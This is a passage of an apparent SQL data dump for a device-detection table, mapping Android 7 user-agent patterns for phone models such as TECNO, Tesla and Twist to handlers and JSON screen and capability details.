Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1024) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1039) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1044) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1053) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1054) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TC56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TCLGalaG60(9108A)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECHSMART T6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO AX8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO AX8S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO CA6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO CA6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO CX Air) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO Camon CX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO Camon CXS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO F2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO F3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO IN5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO K7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO K8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO K9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO KA9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO L9 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO L9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO LA6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO P701) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":450,\"screenHeight\":768,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO SA6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO W1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO W3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO WX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO WX3F LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO WX3LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO WX3P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO WX4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO WX4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO i3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO_F2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TECNO_F3) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TELMA F1+4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TELMA FEEL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TIMXL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TM-5071) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TM-5073) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TM-5201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TM-5571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TOMMY2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TONE-m17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-AL00A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-L21A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-L53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TRT-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TURKCELL T80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tele2_Midi_2_0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Telma_Titan_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tesla_SP3.3 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tesla_SP3.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tesla_SP6.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tesla_SP9.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tesla_SP9.1L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Thor E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Thor Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tiger) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Tommy2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Touch4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TurboX_Ray) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Turbox_S3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Twist (2018)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Twist Metal) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Twist XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U FEEL PRIME) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U PULSE LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U PULSE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U11 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 